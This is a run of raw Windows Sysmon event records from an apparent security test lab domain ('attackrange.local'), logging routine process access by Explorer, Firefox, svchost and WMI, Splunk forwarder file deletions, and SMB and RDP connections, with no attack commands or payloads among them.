10341000x80000000000000001049097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.024{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.024{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.024{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.024{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:00.900{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5AFE784B1D057BC4EC381D0EE98F124,SHA256=BFD3078D42BD584C9EA38576A1D6B02DAEE894D75B2D485DE7B48F1A91F5F1BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001049109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001049108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001049107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001049106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf69fb72.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91D9BDE04BCB008A8F5D5AEFF406F8E9,SHA256=5F77F396A6C60F2E4622DBD550F7D81FF35C3B3C8FE96BAAEB6E8241006B20F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.406{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51034-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001049103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.406{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51034-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x8000000000000000807682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:01.900{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7081D0FF07BCB3BB9C2D605D8CFF44FE,SHA256=C781FB10C299355411E5DDEBFDF7B7B5DAB845E5B5E927CCD7C5A27412CDB201,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.277{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DB81EFB8A9A67056506F28F66428E73,SHA256=7511EFD609D9E15C3143E919004DDA932654709BF11DC8BD7AE1B00A86AD0C0E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:02.931{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4899AFE564FD916780942AEAEEA6418B,SHA256=26AA2C87ED5B6421A590CD67D3F2F67D9FD6F416ADB7A63D5EBAEB88967851FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:02.607{466BC892-02B0-60E8-1600-00000000CF01}13045404C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:02.607{466BC892-02B0-60E8-1600-00000000CF01}13045404C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:02.307{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EFB9DC3110F604CABFA0EC499A4AA0D,SHA256=C24174D6AEF90F0A1777C91F5530464945FC46EF3CD341D70A70B8BD08A4022D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:02.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DAD690BCC81A26D3A2A6463AD4DBDBA,SHA256=6081D3B1EDD7F2CFF87A4690256DC5993743A4FC253459E5D7A0072CA642EA56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:02.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9094EDA7F73AE1E8052043693EA6CD29,SHA256=315079AFDD40970E48F624084F42AF9EA7DF6EFE14614D173A4D11D240C8211A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.788{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-28670-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000807684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:03.962{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16DD4C185E031F49AA3311CF9C60187A,SHA256=A00EACCC909CF8B480A06A41891187E1CAB3A429048F1EDA9305779901816278,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:03.340{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01941053E459693FD721CECA0E0141FC,SHA256=7C61FC6C4EB784E33D7CE18297153CA138F3951A45CD90B7B598A473C3642FA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:04.994{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E145AB44A3B894A9B84035B796AAD9E3,SHA256=16494600331AF8CEAF8647C5A46916533902C054F07A9F5EF560A951F8CC2826,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:04.358{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F475C7E95D4CFF16B6747DB3A7436FF,SHA256=EDC9A12027CCCB59666B9672FDBBE2B0F854CEBE8DACD2716EDEC17EEAE1446C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:04.759{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D76FB3DBADC00E25088C500A5A9DF068,SHA256=0C4868C2C30D1DD4405385D301DB74D795BED4AD2CAC25C587C50FD7AE86637F,IMPHASH=00000000000000000000000000000000falsetrue 